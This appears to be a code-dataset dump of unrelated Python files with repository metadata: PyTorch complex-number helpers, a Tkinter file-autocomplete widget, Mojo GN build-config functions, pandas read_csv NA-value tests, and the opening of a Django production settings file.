>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> y = torch.tensor([[2., -0.], [0.7071, -0.7071]])
>>> dot(x, y)
tensor([4., 0.])
"""
return (x * y).sum(dim=-1)
def pow(x: torch.Tensor, exponent: float) -> torch.Tensor:
r"""Returns the power of \(x\) with `exponent`.
$$ x^p = \left| x \right|^p \exp(i \phi(x))^p $$
Args:
x: A complex tensor, \((*, 2)\).
exponent: The exponent \(p\).
Returns:
The power tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> pow(x, 2.)
tensor([[ 4.0000e+00, 0.0000e+00],
[-4.3711e-08, 9.9998e-01]])
"""
r = mod(x, squared=True) ** (exponent / 2)
phi = angle(x) * exponent
return polar(r, phi)
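# Hedged usage sketch (not part of the module above): a quick consistency check
# composing the helpers. prod(x, conj(x)) should be purely real, with real part
# equal to mod(x, squared=True); the sample values below are illustrative only.
x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
xxbar = prod(x, conj(x))
assert torch.allclose(real(xxbar), mod(x, squared=True))
assert torch.allclose(imag(xxbar), torch.zeros_like(imag(xxbar)))
assert torch.allclose(polar(mod(x), angle(x)), x, atol=1e-4)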
| 23.103586
| 72
| 0.459907
|
82e5834fde2f8a5a129e78d0aef493adfdd8b1ee
| 12,116
|
py
|
Python
|
recipes/Python/580771_Tkinter_file_autocomplete_entry/recipe-580771.py
|
tdiprima/code
|
61a74f5f93da087d27c70b2efe779ac6bd2a3b4f
|
[
"MIT"
] | 2,023
|
2017-07-29T09:34:46.000Z
|
2022-03-24T08:00:45.000Z
|
recipes/Python/580771_Tkinter_file_autocomplete_entry/recipe-580771.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 32
|
2017-09-02T17:20:08.000Z
|
2022-02-11T17:49:37.000Z
|
recipes/Python/580771_Tkinter_file_autocomplete_entry/recipe-580771.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 780
|
2017-07-28T19:23:28.000Z
|
2022-03-25T20:39:41.000Z
|
# Author: Miguel Martinez Lopez
# Version: 0.6
import re
import os
try:
from Tkinter import StringVar, Entry, Frame, Listbox, Button, Scrollbar
from Tkconstants import *
except ImportError:
from tkinter import StringVar, Entry, Frame, Listbox, Button, Scrollbar
from tkinter.constants import *
try:
from tkFileDialog import *
except ImportError:
from tkinter.filedialog import *
def autoscroll(sbar, first, last):
"""Hide and show scrollbar as needed."""
first, last = float(first), float(last)
if first <= 0 and last >= 1:
sbar.grid_remove()
else:
sbar.grid()
sbar.set(first, last)
class Combobox_Autocomplete(Entry, object):
def __init__(self, master, list_of_items=None, autocomplete_function=None, listbox_width=None, listbox_height=7, ignorecase_match=False, startswith_match=True, vscrollbar=True, hscrollbar=True, **kwargs):
if hasattr(self, "autocomplete_function"):
if autocomplete_function is not None:
raise ValueError("Combobox_Autocomplete subclass has 'autocomplete_function' implemented")
else:
if autocomplete_function is not None:
self.autocomplete_function = autocomplete_function
else:
if list_of_items is None:
raise ValueError("If not guiven complete function, list_of_items can't be 'None'")
if not ignorecase_match:
if startswith_match:
def matches_function(entry_data, item):
return item.startswith(entry_data)
else:
def matches_function(entry_data, item):
return entry_data in item
self.autocomplete_function = lambda entry_data: [item for item in self.list_of_items if matches_function(entry_data, item)]
else:
if startswith_match:
def matches_function(escaped_entry_data, item):
if re.match(escaped_entry_data, item, re.IGNORECASE):
return True
else:
return False
else:
def matches_function(escaped_entry_data, item):
if re.search(escaped_entry_data, item, re.IGNORECASE):
return True
else:
return False
def autocomplete_function(entry_data):
escaped_entry_data = re.escape(entry_data)
return [item for item in self.list_of_items if matches_function(escaped_entry_data, item)]
self.autocomplete_function = autocomplete_function
self._listbox_height = int(listbox_height)
self._listbox_width = listbox_width
self.list_of_items = list_of_items
self._use_vscrollbar = vscrollbar
self._use_hscrollbar = hscrollbar
kwargs.setdefault("background", "white")
if "textvariable" in kwargs:
self._entry_var = kwargs["textvariable"]
else:
self._entry_var = kwargs["textvariable"] = StringVar()
Entry.__init__(self, master, **kwargs)
self._trace_id = self._entry_var.trace('w', self._on_change_entry_var)
self._listbox = None
self.bind("<Tab>", self._on_tab)
self.bind("<Up>", self._previous)
self.bind("<Down>", self._next)
self.bind('<Control-n>', self._next)
self.bind('<Control-p>', self._previous)
self.bind("<Return>", self._update_entry_from_listbox)
self.bind("<Escape>", lambda event: self.unpost_listbox())
def _on_tab(self, event):
self.post_listbox()
return "break"
def _on_change_entry_var(self, name, index, mode):
entry_data = self._entry_var.get()
if entry_data == '':
self.unpost_listbox()
self.focus()
else:
values = self.autocomplete_function(entry_data)
if values:
if self._listbox is None:
self._build_listbox(values)
else:
self._listbox.delete(0, END)
height = min(self._listbox_height, len(values))
self._listbox.configure(height=height)
for item in values:
self._listbox.insert(END, item)
else:
self.unpost_listbox()
self.focus()
def _build_listbox(self, values):
listbox_frame = Frame()
self._listbox = Listbox(listbox_frame, background="white", selectmode=SINGLE, activestyle="none", exportselection=False)
self._listbox.grid(row=0, column=0,sticky = N+E+W+S)
self._listbox.bind("<ButtonRelease-1>", self._update_entry_from_listbox)
self._listbox.bind("<Return>", self._update_entry_from_listbox)
self._listbox.bind("<Escape>", lambda event: self.unpost_listbox())
self._listbox.bind('<Control-n>', self._next)
self._listbox.bind('<Control-p>', self._previous)
if self._use_vscrollbar:
vbar = Scrollbar(listbox_frame, orient=VERTICAL, command= self._listbox.yview)
vbar.grid(row=0, column=1, sticky=N+S)
self._listbox.configure(yscrollcommand= lambda f, l: autoscroll(vbar, f, l))
if self._use_hscrollbar:
hbar = Scrollbar(listbox_frame, orient=HORIZONTAL, command= self._listbox.xview)
hbar.grid(row=1, column=0, sticky=E+W)
self._listbox.configure(xscrollcommand= lambda f, l: autoscroll(hbar, f, l))
listbox_frame.grid_columnconfigure(0, weight= 1)
listbox_frame.grid_rowconfigure(0, weight= 1)
x = -self.cget("borderwidth") - self.cget("highlightthickness")
y = self.winfo_height()-self.cget("borderwidth") - self.cget("highlightthickness")
if self._listbox_width:
width = self._listbox_width
else:
width=self.winfo_width()
listbox_frame.place(in_=self, x=x, y=y, width=width)
height = min(self._listbox_height, len(values))
self._listbox.configure(height=height)
for item in values:
self._listbox.insert(END, item)
def post_listbox(self):
if self._listbox is not None: return
entry_data = self._entry_var.get()
if entry_data == '': return
values = self.autocomplete_function(entry_data)
if values:
self._build_listbox(values)
def unpost_listbox(self):
if self._listbox is not None:
self._listbox.master.destroy()
self._listbox = None
def get_value(self):
return self._entry_var.get()
def set_value(self, text, close_dialog=False):
self._set_var(text)
if close_dialog:
self.unpost_listbox()
self.icursor(END)
self.xview_moveto(1.0)
def _set_var(self, text):
self._entry_var.trace_vdelete("w", self._trace_id)
self._entry_var.set(text)
self._trace_id = self._entry_var.trace('w', self._on_change_entry_var)
def _update_entry_from_listbox(self, event):
if self._listbox is not None:
current_selection = self._listbox.curselection()
if current_selection:
text = self._listbox.get(current_selection)
self._set_var(text)
self._listbox.master.destroy()
self._listbox = None
self.focus()
self.icursor(END)
self.xview_moveto(1.0)
return "break"
def _previous(self, event):
if self._listbox is not None:
current_selection = self._listbox.curselection()
if len(current_selection)==0:
self._listbox.selection_set(0)
self._listbox.activate(0)
else:
index = int(current_selection[0])
self._listbox.selection_clear(index)
if index == 0:
index = END
else:
index -= 1
self._listbox.see(index)
self._listbox.selection_set(first=index)
self._listbox.activate(index)
return "break"
def _next(self, event):
if self._listbox is not None:
current_selection = self._listbox.curselection()
if len(current_selection)==0:
self._listbox.selection_set(0)
self._listbox.activate(0)
else:
index = int(current_selection[0])
self._listbox.selection_clear(index)
if index == self._listbox.size() - 1:
index = 0
else:
index +=1
self._listbox.see(index)
self._listbox.selection_set(index)
self._listbox.activate(index)
return "break"
class File_Entry(Frame, object):
def __init__(self, master, ask_dialog = askopenfilename, width=30, **dialog_options):
Frame.__init__(self, master)
self._file_autocomplete = Combobox_Autocomplete(self, width=width, autocomplete_function=self._autocomplete_function)
self._file_autocomplete.pack(side=LEFT)
button_size = self._file_autocomplete.winfo_reqheight()
button_frame = Frame(self, height=button_size, width=button_size)
button_frame.pack(side=LEFT, padx=(3,0))
button_frame.pack_propagate(0)
Button(button_frame, text="...", command=self._open_dialog).pack(fill=BOTH, expand=True)
self._ask_dialog = ask_dialog
self._dialog_options = dialog_options
@property
def path(self):
return self._file_autocomplete.get_value()
def focus(self):
self._file_autocomplete.focus()
def _open_dialog(self):
filename = self._ask_dialog(**self._dialog_options)
self._file_autocomplete.set_value(filename, close_dialog=True)
def _autocomplete_function(self, base_path):
try:
base_path = os.path.normcase(base_path)
if base_path.endswith(os.path.sep) and os.path.isdir(base_path):
list_of_paths = []
for filename in os.listdir(base_path):
file_path = os.path.join(base_path, filename)
if os.path.isdir(file_path):
file_path += os.sep
list_of_paths.append(file_path)
list_of_paths.sort()
return list_of_paths
else:
current_directory, prefix = os.path.split(base_path)
if not os.path.isdir(current_directory): return None
list_of_paths = []
for filename in os.listdir(current_directory):
filename = os.path.normcase(filename)
if filename.startswith(prefix):
file_path = os.path.join(current_directory, filename)
if os.path.isdir(file_path):
file_path += os.sep
list_of_paths.append(file_path)
list_of_paths.sort()
return list_of_paths
except os.error:
return None
if __name__ == '__main__':
try:
from Tkinter import Tk
except ImportError:
from tkinter import Tk
root = Tk()
root.geometry("300x200")
file_entry = File_Entry(root)
file_entry.pack()
file_entry.focus()
root.mainloop()
| 35.017341
| 208
| 0.569742
|
aeaa135059270c550573096800162fd64d09fe62
| 3,982
|
py
|
Python
|
mojo/tools/mopy/gn.py
|
rafaelw/mojo
|
d3495a129dcbe679e2d5ac729c85a58acf38f8c4
|
[
"BSD-3-Clause"
] | 5
|
2015-04-30T00:13:21.000Z
|
2019-07-10T02:17:24.000Z
|
mojo/tools/mopy/gn.py
|
rafaelw/mojo
|
d3495a129dcbe679e2d5ac729c85a58acf38f8c4
|
[
"BSD-3-Clause"
] | null | null | null |
mojo/tools/mopy/gn.py
|
rafaelw/mojo
|
d3495a129dcbe679e2d5ac729c85a58acf38f8c4
|
[
"BSD-3-Clause"
] | 1
|
2019-05-12T13:53:44.000Z
|
2019-05-12T13:53:44.000Z
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
GN-related configuration functions (e.g., to produce a Config object from a GN
args.gn file).
"""
import ast
import os.path
import re
from .config import Config
def BuildDirectoryForConfig(config, src_root):
"""
Returns the build directory for the given configuration.
"""
subdir = ""
if config.target_os == Config.OS_ANDROID:
subdir += "android_"
if config.target_arch != Config.ARCH_ARM:
subdir += config.target_arch + "_"
elif config.target_os == Config.OS_CHROMEOS:
subdir += "chromeos_"
subdir += "Debug" if config.is_debug else "Release"
if config.sanitizer == Config.SANITIZER_ASAN:
subdir += "_asan"
if not config.is_debug and config.dcheck_always_on:
subdir += "_dcheck"
return os.path.join(src_root, "out", subdir)
def GNArgsForConfig(config):
"""
Return the gn arguments for the given configuration, as a dictionary whose
boolean values are Python booleans.
"""
gn_args = {}
gn_args["is_debug"] = bool(config.is_debug)
gn_args["is_asan"] = config.sanitizer == Config.SANITIZER_ASAN
if config.is_clang is not None:
gn_args["is_clang"] = bool(config.is_clang)
else:
gn_args["is_clang"] = config.target_os not in (Config.OS_ANDROID,
Config.OS_WINDOWS)
if config.values.get("use_goma"):
gn_args["use_goma"] = True
gn_args["goma_dir"] = config.values["goma_dir"]
else:
gn_args["use_goma"] = False
gn_args["dcheck_always_on"] = config.dcheck_always_on
gn_args["mojo_use_nacl"] = config.values.get("use_nacl", False)
if config.target_os == Config.OS_ANDROID:
gn_args["os"] = "android"
elif config.target_os == Config.OS_CHROMEOS:
gn_args["os"] = "chromeos"
gn_args["use_glib"] = False
gn_args["use_system_harfbuzz"] = False
elif config.target_os == Config.OS_LINUX:
gn_args["is_desktop_linux"] = False
gn_args["use_aura"] = False
gn_args["use_glib"] = False
gn_args["use_system_harfbuzz"] = False
gn_args["target_arch"] = config.target_arch
return gn_args
def CommandLineForGNArgs(gn_args):
"""
Returns the list of gn arguments to use with the gn command line.
"""
def _ToCommandLine(key, value):
if type(value) is bool:
return "%s=%s" % (key, "true" if value else "false")
return "%s=\"%s\"" % (key, value)
return [_ToCommandLine(x, y) for x, y in gn_args.iteritems()]
def ConfigForGNArgs(args):
"""
Return the Config object for the given gn arguments, taking a dictionary whose
boolean values are Python booleans.
"""
config_args = {}
config_args["is_debug"] = args.get("is_debug", False)
config_args["sanitizer"] = (
Config.SANITIZER_ASAN if args.get("is_asan") else None)
config_args["is_clang"] = args.get("is_clang", False)
config_args["use_goma"] = args.get("use_goma", False)
if config_args["use_goma"]:
config_args["goma_dir"] = args.get("goma_dir")
config_args["use_nacl"] = args.get("mojo_use_nacl", False)
config_args["target_os"] = args.get("os")
config_args["target_arch"] = args.get("target_arch")
config_args["dcheck_always_on"] = args.get("dcheck_always_on")
return Config(**config_args)
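# Hedged usage sketch (not part of the original module): round-tripping a small
# gn-args dictionary through the helpers above. The argument values are
# illustrative assumptions, not a real build configuration.
def _example_gn_round_trip():
  gn_args = {"is_debug": True, "is_asan": False, "target_arch": "x64"}
  config = ConfigForGNArgs(dict(gn_args))
  # Produce "key=value" strings suitable for `gn gen --args=...`.
  return CommandLineForGNArgs(GNArgsForConfig(config))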
def ParseGNConfig(build_dir):
"""
Parse the gn config file present in |build_dir| and return a dictionary whose
boolean values are Python booleans.
"""
TRANSLATIONS = {
"true": "True",
"false": "False",
}
gn_file = os.path.join(build_dir, "args.gn")
values = {}
with open(gn_file, "r") as f:
for line in f.readlines():
line = re.sub(r"\s*#.*", "", line)
result = re.match(r"^\s*(\w+)\s*=\s*(.*)\s*$", line)
if result:
key = result.group(1)
value = result.group(2)
values[key] = ast.literal_eval(TRANSLATIONS.get(value, value))
return values
| 30.396947
| 80
| 0.672275
|
36a9bb31e79dc2213764822b6aa8753387557b01
| 15,650
|
py
|
Python
|
venv/Lib/site-packages/pandas/tests/io/parser/test_na_values.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/tests/io/parser/test_na_values.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/tests/io/parser/test_na_values.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | 1
|
2021-04-26T22:41:56.000Z
|
2021-04-26T22:41:56.000Z
|
"""
Tests that NA values are properly handled during
parsing for all of the parsers defined in parsers.py
"""
from io import StringIO
import numpy as np
import pytest
from pandas._libs.parsers import STR_NA_VALUES
from pandas import DataFrame, Index, MultiIndex
import pandas._testing as tm
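# Hedged illustration (not one of the parser-fixture tests below): by default,
# read_csv maps the strings in STR_NA_VALUES (e.g. "NA", "", "NaN") to NaN.
def _example_default_na_handling():
    import pandas as pd
    df = pd.read_csv(StringIO("A,B\nNA,1\n,2"))
    return df.isna().sum().to_dict()  # {'A': 2, 'B': 0}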
def test_string_nas(all_parsers):
parser = all_parsers
data = """A,B,C
a,b,c
d,,f
,g,h
"""
result = parser.read_csv(StringIO(data))
expected = DataFrame(
[["a", "b", "c"], ["d", np.nan, "f"], [np.nan, "g", "h"]],
columns=["A", "B", "C"],
)
tm.assert_frame_equal(result, expected)
def test_detect_string_na(all_parsers):
parser = all_parsers
data = """A,B
foo,bar
NA,baz
NaN,nan
"""
expected = DataFrame(
[["foo", "bar"], [np.nan, "baz"], [np.nan, np.nan]], columns=["A", "B"]
)
result = parser.read_csv(StringIO(data))
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"na_values",
[
["-999.0", "-999"],
[-999, -999.0],
[-999.0, -999],
["-999.0"],
["-999"],
[-999.0],
[-999],
],
)
@pytest.mark.parametrize(
"data",
[
"""A,B
-999,1.2
2,-999
3,4.5
""",
"""A,B
-999,1.200
2,-999.000
3,4.500
""",
],
)
def test_non_string_na_values(all_parsers, data, na_values):
# see gh-3611: with an odd float format, we can't match
# the string "999.0" exactly but still need float matching
parser = all_parsers
expected = DataFrame([[np.nan, 1.2], [2.0, np.nan], [3.0, 4.5]], columns=["A", "B"])
result = parser.read_csv(StringIO(data), na_values=na_values)
tm.assert_frame_equal(result, expected)
def test_default_na_values(all_parsers):
_NA_VALUES = {
"-1.#IND",
"1.#QNAN",
"1.#IND",
"-1.#QNAN",
"#N/A",
"N/A",
"n/a",
"NA",
"<NA>",
"#NA",
"NULL",
"null",
"NaN",
"nan",
"-NaN",
"-nan",
"#N/A N/A",
"",
}
assert _NA_VALUES == STR_NA_VALUES
parser = all_parsers
nv = len(_NA_VALUES)
def f(i, v):
if i == 0:
buf = ""
elif i > 0:
buf = "".join([","] * i)
buf = f"{buf}{v}"
if i < nv - 1:
joined = "".join([","] * (nv - i - 1))
buf = f"{buf}{joined}"
return buf
data = StringIO("\n".join(f(i, v) for i, v in enumerate(_NA_VALUES)))
expected = DataFrame(np.nan, columns=range(nv), index=range(nv))
result = parser.read_csv(data, header=None)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("na_values", ["baz", ["baz"]])
def test_custom_na_values(all_parsers, na_values):
parser = all_parsers
data = """A,B,C
ignore,this,row
1,NA,3
-1.#IND,5,baz
7,8,NaN
"""
expected = DataFrame(
[[1.0, np.nan, 3], [np.nan, 5, np.nan], [7, 8, np.nan]], columns=["A", "B", "C"]
)
result = parser.read_csv(StringIO(data), na_values=na_values, skiprows=[1])
tm.assert_frame_equal(result, expected)
def test_bool_na_values(all_parsers):
data = """A,B,C
True,False,True
NA,True,False
False,NA,True"""
parser = all_parsers
result = parser.read_csv(StringIO(data))
expected = DataFrame(
{
"A": np.array([True, np.nan, False], dtype=object),
"B": np.array([False, True, np.nan], dtype=object),
"C": [True, False, True],
}
)
tm.assert_frame_equal(result, expected)
def test_na_value_dict(all_parsers):
data = """A,B,C
foo,bar,NA
bar,foo,foo
foo,bar,NA
bar,foo,foo"""
parser = all_parsers
df = parser.read_csv(StringIO(data), na_values={"A": ["foo"], "B": ["bar"]})
expected = DataFrame(
{
"A": [np.nan, "bar", np.nan, "bar"],
"B": [np.nan, "foo", np.nan, "foo"],
"C": [np.nan, "foo", np.nan, "foo"],
}
)
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize(
"index_col,expected",
[
(
[0],
DataFrame({"b": [np.nan], "c": [1], "d": [5]}, index=Index([0], name="a")),
),
(
[0, 2],
DataFrame(
{"b": [np.nan], "d": [5]},
index=MultiIndex.from_tuples([(0, 1)], names=["a", "c"]),
),
),
(
["a", "c"],
DataFrame(
{"b": [np.nan], "d": [5]},
index=MultiIndex.from_tuples([(0, 1)], names=["a", "c"]),
),
),
],
)
def test_na_value_dict_multi_index(all_parsers, index_col, expected):
data = """\
a,b,c,d
0,NA,1,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), na_values=set(), index_col=index_col)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"kwargs,expected",
[
(
dict(),
DataFrame(
{
"A": ["a", "b", np.nan, "d", "e", np.nan, "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["one", "two", "three", np.nan, "five", np.nan, "seven"],
}
),
),
(
dict(na_values={"A": [], "C": []}, keep_default_na=False),
DataFrame(
{
"A": ["a", "b", "", "d", "e", "nan", "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["one", "two", "three", "nan", "five", "", "seven"],
}
),
),
(
dict(na_values=["a"], keep_default_na=False),
DataFrame(
{
"A": [np.nan, "b", "", "d", "e", "nan", "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["one", "two", "three", "nan", "five", "", "seven"],
}
),
),
(
dict(na_values={"A": [], "C": []}),
DataFrame(
{
"A": ["a", "b", np.nan, "d", "e", np.nan, "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["one", "two", "three", np.nan, "five", np.nan, "seven"],
}
),
),
],
)
def test_na_values_keep_default(all_parsers, kwargs, expected):
data = """\
A,B,C
a,1,one
b,2,two
,3,three
d,4,nan
e,5,five
nan,6,
g,7,seven
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), **kwargs)
tm.assert_frame_equal(result, expected)
def test_no_na_values_no_keep_default(all_parsers):
# see gh-4318: passing na_values=None and
# keep_default_na=False yields 'None" as a na_value
data = """\
A,B,C
a,1,None
b,2,two
,3,None
d,4,nan
e,5,five
nan,6,
g,7,seven
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), keep_default_na=False)
expected = DataFrame(
{
"A": ["a", "b", "", "d", "e", "nan", "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["None", "two", "None", "nan", "five", "", "seven"],
}
)
tm.assert_frame_equal(result, expected)
def test_no_keep_default_na_dict_na_values(all_parsers):
# see gh-19227
data = "a,b\n,2"
parser = all_parsers
result = parser.read_csv(
StringIO(data), na_values={"b": ["2"]}, keep_default_na=False
)
expected = DataFrame({"a": [""], "b": [np.nan]})
tm.assert_frame_equal(result, expected)
def test_no_keep_default_na_dict_na_scalar_values(all_parsers):
# see gh-19227
#
# Scalar values shouldn't cause the parsing to crash or fail.
data = "a,b\n1,2"
parser = all_parsers
df = parser.read_csv(StringIO(data), na_values={"b": 2}, keep_default_na=False)
expected = DataFrame({"a": [1], "b": [np.nan]})
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("col_zero_na_values", [113125, "113125"])
def test_no_keep_default_na_dict_na_values_diff_reprs(all_parsers, col_zero_na_values):
# see gh-19227
data = """\
113125,"blah","/blaha",kjsdkj,412.166,225.874,214.008
729639,"qwer","",asdfkj,466.681,,252.373
"""
parser = all_parsers
expected = DataFrame(
{
0: [np.nan, 729639.0],
1: [np.nan, "qwer"],
2: ["/blaha", np.nan],
3: ["kjsdkj", "asdfkj"],
4: [412.166, 466.681],
5: ["225.874", ""],
6: [np.nan, 252.373],
}
)
result = parser.read_csv(
StringIO(data),
header=None,
keep_default_na=False,
na_values={2: "", 6: "214.008", 1: "blah", 0: col_zero_na_values},
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"na_filter,row_data",
[
(True, [[1, "A"], [np.nan, np.nan], [3, "C"]]),
(False, [["1", "A"], ["nan", "B"], ["3", "C"]]),
],
)
def test_na_values_na_filter_override(all_parsers, na_filter, row_data):
data = """\
A,B
1,A
nan,B
3,C
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), na_values=["B"], na_filter=na_filter)
expected = DataFrame(row_data, columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_na_trailing_columns(all_parsers):
parser = all_parsers
data = """Date,Currency,Symbol,Type,Units,UnitPrice,Cost,Tax
2012-03-14,USD,AAPL,BUY,1000
2012-05-12,USD,SBUX,SELL,500"""
# Trailing columns should be all NaN.
result = parser.read_csv(StringIO(data))
expected = DataFrame(
[
["2012-03-14", "USD", "AAPL", "BUY", 1000, np.nan, np.nan, np.nan],
["2012-05-12", "USD", "SBUX", "SELL", 500, np.nan, np.nan, np.nan],
],
columns=[
"Date",
"Currency",
"Symbol",
"Type",
"Units",
"UnitPrice",
"Cost",
"Tax",
],
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"na_values,row_data",
[
(1, [[np.nan, 2.0], [2.0, np.nan]]),
({"a": 2, "b": 1}, [[1.0, 2.0], [np.nan, np.nan]]),
],
)
def test_na_values_scalar(all_parsers, na_values, row_data):
# see gh-12224
parser = all_parsers
names = ["a", "b"]
data = "1,2\n2,1"
result = parser.read_csv(StringIO(data), names=names, na_values=na_values)
expected = DataFrame(row_data, columns=names)
tm.assert_frame_equal(result, expected)
def test_na_values_dict_aliasing(all_parsers):
parser = all_parsers
na_values = {"a": 2, "b": 1}
na_values_copy = na_values.copy()
names = ["a", "b"]
data = "1,2\n2,1"
expected = DataFrame([[1.0, 2.0], [np.nan, np.nan]], columns=names)
result = parser.read_csv(StringIO(data), names=names, na_values=na_values)
tm.assert_frame_equal(result, expected)
tm.assert_dict_equal(na_values, na_values_copy)
def test_na_values_dict_col_index(all_parsers):
# see gh-14203
data = "a\nfoo\n1"
parser = all_parsers
na_values = {0: "foo"}
result = parser.read_csv(StringIO(data), na_values=na_values)
expected = DataFrame({"a": [np.nan, 1]})
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"data,kwargs,expected",
[
(
str(2 ** 63) + "\n" + str(2 ** 63 + 1),
dict(na_values=[2 ** 63]),
DataFrame([str(2 ** 63), str(2 ** 63 + 1)]),
),
(str(2 ** 63) + ",1" + "\n,2", dict(), DataFrame([[str(2 ** 63), 1], ["", 2]])),
(str(2 ** 63) + "\n1", dict(na_values=[2 ** 63]), DataFrame([np.nan, 1])),
],
)
def test_na_values_uint64(all_parsers, data, kwargs, expected):
# see gh-14983
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None, **kwargs)
tm.assert_frame_equal(result, expected)
def test_empty_na_values_no_default_with_index(all_parsers):
# see gh-15835
data = "a,1\nb,2"
parser = all_parsers
expected = DataFrame({"1": [2]}, index=Index(["b"], name="a"))
result = parser.read_csv(StringIO(data), index_col=0, keep_default_na=False)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"na_filter,index_data", [(False, ["", "5"]), (True, [np.nan, 5.0])]
)
def test_no_na_filter_on_index(all_parsers, na_filter, index_data):
# see gh-5239
#
# Don't parse NA-values in index unless na_filter=True
parser = all_parsers
data = "a,b,c\n1,,3\n4,5,6"
expected = DataFrame({"a": [1, 4], "c": [3, 6]}, index=Index(index_data, name="b"))
result = parser.read_csv(StringIO(data), index_col=[1], na_filter=na_filter)
tm.assert_frame_equal(result, expected)
def test_inf_na_values_with_int_index(all_parsers):
# see gh-17128
parser = all_parsers
data = "idx,col1,col2\n1,3,4\n2,inf,-inf"
# Don't fail with OverflowError with inf's and integer index column.
out = parser.read_csv(StringIO(data), index_col=[0], na_values=["inf", "-inf"])
expected = DataFrame(
{"col1": [3, np.nan], "col2": [4, np.nan]}, index=Index([1, 2], name="idx")
)
tm.assert_frame_equal(out, expected)
@pytest.mark.parametrize("na_filter", [True, False])
def test_na_values_with_dtype_str_and_na_filter(all_parsers, na_filter):
# see gh-20377
parser = all_parsers
data = "a,b,c\n1,,3\n4,5,6"
# na_filter=True --> missing value becomes NaN.
# na_filter=False --> missing value remains empty string.
empty = np.nan if na_filter else ""
expected = DataFrame({"a": ["1", "4"], "b": [empty, "5"], "c": ["3", "6"]})
result = parser.read_csv(StringIO(data), na_filter=na_filter, dtype=str)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"data, na_values",
[
("false,1\n,1\ntrue", None),
("false,1\nnull,1\ntrue", None),
("false,1\nnan,1\ntrue", None),
("false,1\nfoo,1\ntrue", "foo"),
("false,1\nfoo,1\ntrue", ["foo"]),
("false,1\nfoo,1\ntrue", {"a": "foo"}),
],
)
def test_cast_NA_to_bool_raises_error(all_parsers, data, na_values):
parser = all_parsers
msg = (
"(Bool column has NA values in column [0a])|"
"(cannot safely convert passed user dtype of "
"bool for object dtyped data in column 0)"
)
with pytest.raises(ValueError, match=msg):
parser.read_csv(
StringIO(data),
header=None,
names=["a", "b"],
dtype={"a": "bool"},
na_values=na_values,
)
def test_str_nan_dropped(all_parsers):
# see gh-21131
parser = all_parsers
data = """File: small.csv,,
10010010233,0123,654
foo,,bar
01001000155,4530,898"""
result = parser.read_csv(
StringIO(data),
header=None,
names=["col1", "col2", "col3"],
dtype={"col1": str, "col2": str, "col3": str},
).dropna()
expected = DataFrame(
{
"col1": ["10010010233", "01001000155"],
"col2": ["0123", "4530"],
"col3": ["654", "898"],
},
index=[1, 3],
)
tm.assert_frame_equal(result, expected)
| 27.504394
| 89
| 0.518211
|
19e9d3a1f9d6e759c4f79a442f626df1c7df3a75
| 8,864
|
py
|
Python
|
config/settings/production.py
|
NumanIbnMazid/Django_Skeleton_Default
|
4ab147cc91145533f1acc8c364360575e08ca5c8
|
[
"MIT"
] | null | null | null |
config/settings/production.py
|
NumanIbnMazid/Django_Skeleton_Default
|
4ab147cc91145533f1acc8c364360575e08ca5c8
|
[
"MIT"
] | 16
|
2022-01-21T14:40:31.000Z
|
2022-03-31T14:27:25.000Z
|
config/settings/production.py
|
NumanIbnMazid/Django_Skeleton_Default
|
4ab147cc91145533f1acc8c364360575e08ca5c8
|
[
"MIT"
] | null | null | null |
import logging
import sentry_sdk
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.logging import LoggingIntegration
from sentry_sdk.integrations.redis import RedisIntegration
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY")
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["example.com"])
# DATABASES
# ------------------------------------------------------------------------------
DATABASES["default"] = env.db("DATABASE_URL") # noqa F405
DATABASES["default"]["ATOMIC_REQUESTS"] = True # noqa F405
DATABASES["default"]["CONN_MAX_AGE"] = env.int("CONN_MAX_AGE", default=60) # noqa F405
# CACHES
# ------------------------------------------------------------------------------
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": env("REDIS_URL"),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
# Mimicking memcached behavior.
